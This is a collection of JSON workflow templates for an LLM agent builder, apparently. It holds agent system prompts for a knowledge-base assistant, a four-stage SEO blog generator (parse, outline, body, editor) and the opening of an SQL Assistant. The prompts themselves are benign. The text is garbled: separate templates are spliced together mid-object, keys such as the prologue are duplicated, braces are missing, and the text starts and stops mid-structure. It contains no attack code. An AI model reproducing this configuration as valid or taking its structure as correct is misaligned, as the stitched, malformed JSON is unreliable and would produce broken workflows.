For each conclusion, attach 1\u20132 strongest pieces of evidence.\n---\n## Quality Gate Checklist (Verify at Each Stage)\n* **Stage 1 (Decomposition)**:\n * [ ] Key concepts and expected outputs identified\n * [ ] Required facts/data points listed\n* **Stage 2 (Retrieval)**:\n * [ ] Meets quality standards (see above)\n * [ ] If not met: execute query iteration\n* **Stage 3 (Generation)**:\n * [ ] Each conclusion has at least one direct evidence source\n * [ ] State assumptions/uncertainties\n * [ ] Provide next-step suggestions or experiment/retrieval plans\n * [ ] Final length and depth match user expectations (comply with word count/format if specified)\n---\n## Core Principles\n1. **Strict reliance on the knowledge base**: answers must be **fully bounded** by the content retrieved from the knowledge base.\n2. **No fabrication**: do not generate, infer, or create information that is not explicitly present in the knowledge base.\n3. **Accuracy first**: prefer incompleteness over inaccurate content.\n4. **Output format**:\n * Hierarchically clear modular structure\n * Logical grouping according to the MECE principle\n * Professionally presented formatting\n * Step-by-step cognitive guidance\n * Reasonable use of headings and dividers for clarity\n * *Italicize* key parameters\n * **Bold** critical information\n5. **LaTeX formula requirements**:\n * Inline formulas: start and end with `$`\n * Block formulas: start and end with `$$`, each `$$` on its own line\n * Block formula content must comply with LaTeX math syntax\n * Verify formula correctness\n---\n## Additional Notes (Interaction & Failure Strategy)\n* If the knowledge base does not cover critical facts: explicitly inform the user (with sample wording)\n* For time-sensitive issues: enforce time filtering in the search request, and indicate the latest retrieval date in the answer.\n* Language requirement: answer in the user\u2019s preferred language\n",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[
{
"component_name":"Retrieval",
"name":"Retrieval",
"params":{
"cross_languages":[],
"description":"",
"empty_response":"",
"kb_ids":[],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Knowledge Base Agent"
},
"dragging":false,
"id":"Agent:NewPumasLick",
"measured":{
"height":84,
"width":200
},
"position":{
"x":347.00048227952215,
"y":186.49109364794631
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
"description":"This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don’t need any writing experience. Just provide a topic or short request — the system will handle the rest.",
"canvas_type":"Marketing",
"dsl":{
"components":{
"Agent:BetterSitesSend":{
"downstream":[
"Agent:EagerNailsRemain"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - 
[Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"Agent:ClearRabbitsScream"
]
},
"Agent:ClearRabbitsScream":{
"downstream":[
"Agent:BetterSitesSend"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":1,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"begin"
]
},
"Agent:EagerNailsRemain":{
"downstream":[
"Agent:LovelyHeadsOwn"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Outline agent output is {Agent:BetterSitesSend@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"Agent:BetterSitesSend"
]
},
"Agent:LovelyHeadsOwn":{
"downstream":[
"Message:LegalBeansBet"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Outline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"Agent:EagerNailsRemain"
]
},
"Message:LegalBeansBet":{
"downstream":[],
"obj":{
"component_name":"Message",
"params":{
"content":[
"{Agent:LovelyHeadsOwn@content}"
]
}
},
"upstream":[
"Agent:LovelyHeadsOwn"
]
},
"begin":{
"downstream":[
"Agent:ClearRabbitsScream"
],
"obj":{
"component_name":"Begin",
"params":{
"enablePrologue":true,
"inputs":{},
"mode":"conversational",
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
},
"label":"Begin",
"name":"begin"
},
"id":"begin",
"measured":{
"height":48,
"width":200
},
"position":{
"x":50,
"y":200
},
"selected":false,
"sourcePosition":"left",
"targetPosition":"right",
"type":"beginNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":1,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Parse And Keyword Agent"
},
"dragging":false,
"id":"Agent:ClearRabbitsScream",
"measured":{
"height":84,
"width":200
},
"position":{
"x":344.7766966202233,
"y":234.82202253184496
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - 
[Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Outline Agent"
},
"dragging":false,
"id":"Agent:BetterSitesSend",
"measured":{
"height":84,
"width":200
},
"position":{
"x":613.4368763415628,
"y":164.3074269048589
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_0"
},
"dragging":false,
"id":"Tool:SharpPensBurn",
"measured":{
"height":44,
"width":200
},
"position":{
"x":580.1877078861457,
"y":287.7669662022325
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Outline agent output is {Agent:BetterSitesSend@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Body Agent"
},
"dragging":false,
"id":"Agent:EagerNailsRemain",
"measured":{
"height":84,
"width":200
},
"position":{
"x":889.0614605692713,
"y":247.00973041799065
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_1"
},
"dragging":false,
"id":"Tool:WickedDeerHeal",
"measured":{
"height":44,
"width":200
},
"position":{
"x":853.2006404239659,
"y":364.37541577229143
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Outline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Editor Agent"
},
"dragging":false,
"id":"Agent:LovelyHeadsOwn",
"measured":{
"height":84,
"width":200
},
"position":{
"x":1160.3332919804993,
"y":149.50806732882472
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"content":[
"{Agent:LovelyHeadsOwn@content}"
]
},
"label":"Message",
"name":"Response"
},
"dragging":false,
"id":"Message:LegalBeansBet",
"measured":{
"height":56,
"width":200
},
"position":{
"x":1370.6665839609984,
"y":267.0323933738015
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"messageNode"
},
{
"data":{
"form":{
"text":"This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don\u2019t need any writing experience. Just provide a topic or short request \u2014 the system will handle the rest.\n\nThe process includes the following key stages:\n\n1. **Understanding your topic and goals**\n2. **Designing the blog structure**\n3. **Writing high-quality content**\n\n\n"
},
"label":"Note",
"name":"Workflow Overall Description"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":205,
"id":"Note:SlimyGhostsWear",
"measured":{
"height":205,
"width":415
},
"position":{
"x":-284.3143151688742,
"y":150.47632147913419
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":415
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent reads the user\u2019s input and figures out what kind of blog needs to be written.\n\n**What it does**:\n- Understands the main topic you want to write about \n- Identifies who the blog is for (e.g., beginners, marketers, developers) \n- Determines the writing purpose (e.g., SEO traffic, product promotion, education) \n- Suggests 3\u20135 long-tail SEO keywords related to the topic"
},
"label":"Note",
"name":"Parse And Keyword Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":152,
"id":"Note:EmptyChairsShake",
"measured":{
"height":152,
"width":340
},
"position":{
"x":295.04147626768133,
"y":372.2755718118446
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":340
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent builds the blog structure \u2014 just like writing a table of contents before you start writing the full article.\n\n**What it does**:\n- Suggests a clear blog title that includes important keywords \n- Breaks the article into sections using H2 and H3 headings (like a professional blog layout) \n- Assigns 1\u20132 recommended keywords to each section to help with SEO \n- Follows the writing goal and target audience set in the previous step"
},
"label":"Note",
"name":"Outline Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":146,
"id":"Note:TallMelonsNotice",
"measured":{
"height":146,
"width":343
},
"position":{
"x":598.5644991893463,
"y":5.801054564756448
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":343
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is responsible for writing the actual content of the blog \u2014 paragraph by paragraph \u2014 based on the outline created earlier.\n\n**What it does**:\n- Looks at each H2/H3 section in the outline \n- Writes 150\u2013220 words of clear, helpful, and well-structured content per section \n- Includes the suggested SEO keywords naturally (not keyword stuffing) \n- Uses real examples or facts if needed (by calling a web search tool like Tavily)"
},
"label":"Note",
"name":"Body Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":137,
"id":"Note:RipeCougarsBuild",
"measured":{
"height":137,
"width":319
},
"position":{
"x":860.4854129814981,
"y":427.2196835690842
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":319
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent reviews the entire blog draft to make sure it is smooth, professional, and SEO-friendly. It acts like a human editor before publishing.\n\n**What it does**:\n- Polishes the writing: improves sentence clarity, fixes awkward phrasing \n- Makes sure the content flows well from one section to the next \n- Double-checks keyword usage: are they present, natural, and not overused? \n- Verifies the blog structure (H1, H2, H3 headings) is correct \n- Adds two key SEO elements:\n - **Meta Title** (shows up in search results)\n - **Meta Description** (summary for Google and social sharing)"
"description":"SQL Assistant is an AI-powered tool that lets business users turn plain-English questions into fully formed SQL queries. Simply type your question (e.g., “Show me last quarter’s top 10 products by revenue”) and SQL Assistant generates the exact SQL, runs it against your database, and returns the results in seconds. ",
"canvas_type":"Marketing",
"dsl":{
"components":{
"Agent:WickedGoatsDivide":{
"downstream":[
"ExeSQL:TiredShirtsPull"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":"",
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.7,
"llm_id":"qwen-max@Tongyi-Qianwen",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
